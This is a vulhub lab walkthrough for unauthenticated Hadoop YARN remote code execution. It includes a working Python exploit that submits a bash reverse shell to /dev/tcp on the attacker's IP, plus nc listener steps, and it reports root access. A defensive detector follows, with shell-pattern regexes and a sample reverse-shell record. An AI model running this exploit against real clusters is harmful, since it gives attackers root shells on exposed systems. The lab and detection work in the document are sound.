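First, change into the lab directory inside vulhub:
vulhub/hadoop/unauthorized-yarn
Then run docker-compose up -d to pull and start the environment.
Run docker ps to check that the container has started.
Then browse to the page at the virtual machine's IP and port:
192.168.127.131:8088
This is the exp; write it to exploit.py in the lab directory: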
```python
#!/usr/bin/env python
import requests
import sys

target = 'http://192.168.127.131'  # target machine IP
lhost = '192.168.10.56'  # put your local IP here; listen on port 4444 with nc

target = sys.argv[1]
#lhost = sys.argv[2]

# Step 1: ask the ResourceManager for a new application id
url = target + '/ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']

# Step 2: submit the application; the command runs in the application master container
url = target + '/ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/4444 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)
```
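Then run sudo nc -lvvp 4444  # on the attacking machine, use nc to open a listener on port 4444
sudo python3 unauthorized-yarn-hadoop.py http://192.168.127.131:8088  # run the exp
The shell then connects back to the listener.
The whoami command shows that our privileges are root.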
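From the defender's side, the two POST requests used above are the signal to watch for. The following is an added example, not part of the original write-up: it inspects HTTP request records captured in front of the ResourceManager and flags unauthenticated submissions and shell-spawning `am-container-spec` commands. The record fields (`method`, `path`, `user`, `body`), the sample records and the heuristic patterns are assumptions made for illustration.

```python
import json
import re

NEW_APP = "/ws/v1/cluster/apps/new-application"
SUBMIT = "/ws/v1/cluster/apps"
# Heuristic patterns (assumptions, not exhaustive) for commands that hand out a shell.
SUSPICIOUS = [
    ("/dev/tcp redirection", re.compile(r"/dev/(?:tcp|udp)/")),
    ("interactive shell", re.compile(r"\b(?:ba)?sh\s+-i\b")),
    ("download piped to shell", re.compile(r"\b(?:curl|wget)\b[^|]*\|\s*(?:ba)?sh\b")),
]

def am_command(body_text):
    """Return am-container-spec.commands.command from a submission body, or None."""
    try:
        node = json.loads(body_text)
    except (TypeError, ValueError):
        return None
    for key in ("am-container-spec", "commands", "command"):
        if not isinstance(node, dict):
            return None
        node = node.get(key)
    return node if isinstance(node, str) else None

def inspect_request(rec):
    """Return findings for one record (hypothetical fields: method, path, user, body)."""
    path = rec["path"].rstrip("/")
    if rec["method"] != "POST" or path not in (NEW_APP, SUBMIT):
        return []
    findings = []
    if not rec.get("user"):  # no authenticated identity attached by the proxy
        findings.append("unauthenticated POST " + path)
    if path == SUBMIT:
        cmd = am_command(rec.get("body"))
        if cmd is None:
            findings.append("submission without a readable command")
        else:
            findings += [label for label, pat in SUSPICIOUS if pat.search(cmd)]
    return findings

def _rec(method, path, user, cmd=None):  # builds one constructed record
    body = json.dumps({"am-container-spec": {"commands": {"command": cmd}}}) if cmd else ""
    return {"method": method, "path": path, "user": user, "body": body}
SAMPLES = [  # constructed records; 192.0.2.10 is a documentation address
    _rec("GET", "/ws/v1/cluster/info", None),
    _rec("POST", NEW_APP, None),
    _rec("POST", SUBMIT, None, "/bin/bash -i >& /dev/tcp/192.0.2.10/4444 0>&1"),
    _rec("POST", SUBMIT, "etl-svc", "spark-submit job.py"),
]
```

Calling `inspect_request` on each entry of `SAMPLES` returns an empty list for the read-only request and the authenticated job, and a list of findings for the two unauthenticated POSTs.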